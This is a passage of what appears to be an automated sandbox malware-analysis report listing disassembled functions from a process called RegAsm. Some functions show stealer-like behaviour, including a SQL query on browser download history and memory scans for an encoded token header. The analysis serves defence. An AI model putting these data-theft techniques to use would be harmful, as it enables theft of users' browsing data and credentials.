                                                                                    • moz_xmalloc.MOZGLUE ref: 6CC3F072
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                                    • String ID:
                                                                                    • API String ID: 1148890222-0
                                                                                    • Opcode ID: 9425729af7d86e4f4a491fdbe31271777e00212789c18322d2fd1f8f387815f3
                                                                                    • Instruction ID: e20aef7dbec717949eaf4c7e65986a924002eef227032a9315ff1c521ff2d74e
                                                                                    • Opcode Fuzzy Hash: 9425729af7d86e4f4a491fdbe31271777e00212789c18322d2fd1f8f387815f3
                                                                                    • Instruction Fuzzy Hash: 0041D9B1A001169FCB08CF68EC809AE7765FF88314B24466CE81AD7794FB75E915C7E1
                                                                                    Function 0041612D Relevance: 12.1, APIs: 8, Instructions: 109stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00416132
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00416188
                                                                                      • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 004161AE
                                                                                    • lstrcat.KERNEL32(?,?), ref: 004161CE
                                                                                    • lstrcat.KERNEL32(?,?), ref: 004161E2
                                                                                    • lstrcat.KERNEL32(?), ref: 004161F5
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00416209
                                                                                    • lstrcat.KERNEL32(?), ref: 0041621C
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                      • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425BF6,?,?), ref: 00410CF6
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00415E66: _EH_prolog.MSVCRT ref: 00415E6B
                                                                                      • Part of subcall function 00415E66: GetProcessHeap.KERNEL32(00000000,0098967F,?,00000104), ref: 00415E83
                                                                                      • Part of subcall function 00415E66: HeapAlloc.KERNEL32(00000000,?,00000104), ref: 00415E8A
                                                                                      • Part of subcall function 00415E66: wsprintfA.USER32 ref: 00415EA2
                                                                                      • Part of subcall function 00415E66: FindFirstFileA.KERNEL32(?,?), ref: 00415EB9
                                                                                      • Part of subcall function 00415E66: StrCmpCA.SHLWAPI(?,00426894), ref: 00415ED6
                                                                                      • Part of subcall function 00415E66: StrCmpCA.SHLWAPI(?,00426898), ref: 00415EF0
                                                                                      • Part of subcall function 00415E66: wsprintfA.USER32 ref: 00415F14
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$H_prolog$FileHeapwsprintf$AllocAttributesFindFirstFolderPathProcesslstrcpy
                                                                                    • String ID:
                                                                                    • API String ID: 2058169020-0
                                                                                    • Opcode ID: 27df2bee6747110bfdf8ae1cd169a3c4ba849b41f39ec8b444c4dbb6a37d260a
                                                                                    • Instruction ID: c8bc0cfaec16e0a9c8e3cc6943dd29f550fca9c9c6472c90ce97e84fdf381955
                                                                                    • Opcode Fuzzy Hash: 27df2bee6747110bfdf8ae1cd169a3c4ba849b41f39ec8b444c4dbb6a37d260a
                                                                                    • Instruction Fuzzy Hash: A541FEB2D0022DAACF11EBE0DC49EDE77BCAF1D314F4005AAB505E3051EA78D7888B64
                                                                                    Function 6CCAB540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6CCAB5B9
                                                                                    • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6CCAB5C5
                                                                                    • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6CCAB5DA
                                                                                    • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6CCAB5F4
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CCAB605
                                                                                    • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6CCAB61F
                                                                                    • std::_Facet_Register.LIBCPMT ref: 6CCAB631
                                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCAB655
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
                                                                                    • String ID:
                                                                                    • API String ID: 1276798925-0
                                                                                    • Opcode ID: d6fc7ce9e986f3d2a4060040e041f359518c70ffacd4c9817143981d748e8850
                                                                                    • Instruction ID: 913224d398ae304cd8a06d744b8b942bfc86cdbe9b2fc2313d0dbbd9c068a89a
                                                                                    • Opcode Fuzzy Hash: d6fc7ce9e986f3d2a4060040e041f359518c70ffacd4c9817143981d748e8850
                                                                                    • Instruction Fuzzy Hash: 3531B379B00205CFCB00DFF9C8A89AEB7B5FF8A324B150599D90297740EB34A807CB95
                                                                                    Function 004074E2 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 273stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004074E7
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004077B3
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004077C7
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy$lstrlen$lstrcat$CreateObjectSingleThreadWait
                                                                                    • String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
                                                                                    • API String ID: 3193997572-2241552939
                                                                                    • Opcode ID: e6e133c5fb17f6f2cfa1bcf028b0cd6442493e8acae44902d9d727aa251ed442
                                                                                    • Instruction ID: 3cbf0dc831a6fed7af1a63fcab9d415d7072c1493bcc549ce477771eaf9d6083
                                                                                    • Opcode Fuzzy Hash: e6e133c5fb17f6f2cfa1bcf028b0cd6442493e8acae44902d9d727aa251ed442
                                                                                    • Instruction Fuzzy Hash: 4BB13C71904248EACB15EBE5D956BDDBBB4AF18308F5040BEE406725C2DF782B0CDB26
                                                                                    Function 6CC49830 Relevance: 10.7, APIs: 7, Instructions: 196COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • free.MOZGLUE(?,?,?,6CC97ABE), ref: 6CC4985B
                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6CC97ABE), ref: 6CC498A8
                                                                                    • moz_xmalloc.MOZGLUE(00000020), ref: 6CC49909
                                                                                    • memcpy.VCRUNTIME140(00000023,?,?), ref: 6CC49918
                                                                                    • free.MOZGLUE(?), ref: 6CC49975
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
                                                                                    • String ID:
                                                                                    • API String ID: 1281542009-0
                                                                                    • Opcode ID: 0764e775a210bb2d539650b1298f21c246cbe7a57411dac5fa46b3089065f3c7
                                                                                    • Instruction ID: 0abbb1056453f3e8e5dd87810baab3b36d638fe6d94386d0e887b349c37078c2
                                                                                    • Opcode Fuzzy Hash: 0764e775a210bb2d539650b1298f21c246cbe7a57411dac5fa46b3089065f3c7
                                                                                    • Instruction Fuzzy Hash: 6B719C746007158FC725CF28C580956B7F5FF4A324B248AADE85A8BBA0E771F845CB50
                                                                                    Function 6CC4B790 Relevance: 10.6, APIs: 7, Instructions: 147COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6CC8CC83,?,?,?,?,?,?,?,?,?,6CC8BCAE,?,?,6CC7DC2C), ref: 6CC4B7E6
                                                                                    • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6CC8CC83,?,?,?,?,?,?,?,?,?,6CC8BCAE,?,?,6CC7DC2C), ref: 6CC4B80C
                                                                                    • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6CC8CC83,?,?,?,?,?,?,?,?,?,6CC8BCAE), ref: 6CC4B88E
                                                                                    • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6CC8CC83,?,?,?,?,?,?,?,?,?,6CC8BCAE,?,?,6CC7DC2C), ref: 6CC4B896
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
                                                                                    • String ID:
                                                                                    • API String ID: 922945588-0
                                                                                    • Opcode ID: bcdd91ffc4d637c9301c608326139dc0e72ea955073c86225b9fe72161bbf8dc
                                                                                    • Instruction ID: b38f9e6e4200ff579972aa192a45d391532718b6047f1fa906ce11a3bd42811f
                                                                                    • Opcode Fuzzy Hash: bcdd91ffc4d637c9301c608326139dc0e72ea955073c86225b9fe72161bbf8dc
                                                                                    • Instruction Fuzzy Hash: FF516B35700A048FDB25CF59C4A4A6EBBF5FF89318B69C95DE98A87351D731E802CB80
                                                                                    Function 0040F388 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • strlen.MSVCRT ref: 0040F39C
                                                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 0040F3BD
                                                                                      • Part of subcall function 0040F1D6: strlen.MSVCRT ref: 0040F1E2
                                                                                      • Part of subcall function 0040F1D6: strlen.MSVCRT ref: 0040F1F8
                                                                                      • Part of subcall function 0040F1D6: strlen.MSVCRT ref: 0040F291
                                                                                    • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,00000000,?,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000,000000FF), ref: 0040F3EA
                                                                                    • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 0040F4B4
                                                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 0040F4C5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: strlen$QueryVirtual
                                                                                    • String ID: @
                                                                                    • API String ID: 3099930812-2766056989
                                                                                    • Opcode ID: b4548a7c55d638266e0508bb0abe080468fb6bf61126806d7a12c96a6de38829
                                                                                    • Instruction ID: 466afe4c3685285f2ebe0489a4595054022d0f09b2a7b9cf482a5e365b85556b
                                                                                    • Opcode Fuzzy Hash: b4548a7c55d638266e0508bb0abe080468fb6bf61126806d7a12c96a6de38829
                                                                                    • Instruction Fuzzy Hash: 36416971A00109AFEF24DE90CD45AEF7BB6EB98354F14803AF901B2190D7798E54DBA8
                                                                                    Function 004114EE Relevance: 10.6, APIs: 7, Instructions: 119stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004114F3
                                                                                    • strtok_s.MSVCRT ref: 0041151E
                                                                                    • StrCmpCA.SHLWAPI(00000000,00426504,00000001,?,?,?,00000000), ref: 00411561
                                                                                    • StrCmpCA.SHLWAPI(00000000,00426500,00000001,?,?,?,00000000), ref: 0041158F
                                                                                    • StrCmpCA.SHLWAPI(00000000,004264FC,00000001,?,?,?,00000000), ref: 004115B4
                                                                                    • StrCmpCA.SHLWAPI(00000000,004264F8,00000001,?,?,?,00000000), ref: 004115E5
                                                                                    • strtok_s.MSVCRT ref: 0041161B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: strtok_s$H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 1158113254-0
                                                                                    • Opcode ID: 0320dba5699f5749e52ca151f4d453234b55d3e46c78272ce7a3c657dc445f85
                                                                                    • Instruction ID: 983e4892bacab3efc4b84ef6dd796cc5fbf630586b20b5c27d1ffa4e4bf1df50
                                                                                    • Opcode Fuzzy Hash: 0320dba5699f5749e52ca151f4d453234b55d3e46c78272ce7a3c657dc445f85
                                                                                    • Instruction Fuzzy Hash: CD41AF70A00106EBDB14DF64DD81BEAB7E8BB58315F10052FE206E66A1DB3CCA858B59
                                                                                    Function 6CC81D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC81D0F
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,6CC81BE3,?,?,6CC81D96,00000000), ref: 6CC81D18
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,6CC81BE3,?,?,6CC81D96,00000000), ref: 6CC81D4C
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC81DB7
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC81DC0
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC81DDA
                                                                                      • Part of subcall function 6CC81EF0: GetCurrentThreadId.KERNEL32 ref: 6CC81F03
                                                                                      • Part of subcall function 6CC81EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6CC81DF2,00000000,00000000), ref: 6CC81F0C
                                                                                      • Part of subcall function 6CC81EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6CC81F20
                                                                                    • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6CC81DF4
                                                                                      • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                                                    • String ID:
                                                                                    • API String ID: 1880959753-0
                                                                                    • Opcode ID: ebcb6e301a00faaf143ae2bbd784498adb6af81b87cf87779cd58181d6bcb967
                                                                                    • Instruction ID: cb0a82b2f0db93b956465db9ded3e4cc19976113097c018a5294d4f85013352e
                                                                                    • Opcode Fuzzy Hash: ebcb6e301a00faaf143ae2bbd784498adb6af81b87cf87779cd58181d6bcb967
                                                                                    • Instruction Fuzzy Hash: 0B4164B52017009FCB10CF69C498B5ABBF9FB89318F10446EE9AA87B41DB71F854CB94
                                                                                    Function 6CC438A0 Relevance: 10.6, APIs: 7, Instructions: 80memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBE220,?,?,?,?,6CC43899,?), ref: 6CC438B2
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBE220,?,?,?,6CC43899,?), ref: 6CC438C3
                                                                                    • free.MOZGLUE(00000000,?,?,?,6CC43899,?), ref: 6CC438F1
                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CC43920
                                                                                    • RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6CC43899,?), ref: 6CC4392F
                                                                                    • RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6CC43899,?), ref: 6CC43943
                                                                                    • RtlFreeHeap.NTDLL(?,00000000,0000002C), ref: 6CC4396E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
                                                                                    • String ID:
                                                                                    • API String ID: 3047341122-0
                                                                                    • Opcode ID: 7cbc156125db256caabd5373d54ac80fb1d1d4e85ea225023b3518bd97a626a4
                                                                                    • Instruction ID: effeb415e0b3bdc624c5972bd2ad697245cf154774d3e70c63b45919c07aac4e
                                                                                    • Opcode Fuzzy Hash: 7cbc156125db256caabd5373d54ac80fb1d1d4e85ea225023b3518bd97a626a4
                                                                                    • Instruction Fuzzy Hash: F221F172600614DFD720DF65C884B86B7B9EF85328F19C429E95A97B10E735F846CB90
                                                                                    Function 6CC784E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC784F3
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC7850A
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC7851E
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC7855B
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC7856F
                                                                                    • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC785AC
                                                                                      • Part of subcall function 6CC77670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CC785B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC7767F
                                                                                      • Part of subcall function 6CC77670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CC785B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC77693
                                                                                      • Part of subcall function 6CC77670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6CC785B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC776A7
                                                                                    • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC785B2
                                                                                      • Part of subcall function 6CC55E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC55EDB
                                                                                      • Part of subcall function 6CC55E90: memset.VCRUNTIME140(6CC97765,000000E5,55CCCCCC), ref: 6CC55F27
                                                                                      • Part of subcall function 6CC55E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC55FB2
                                                                                    Memory Dump Source
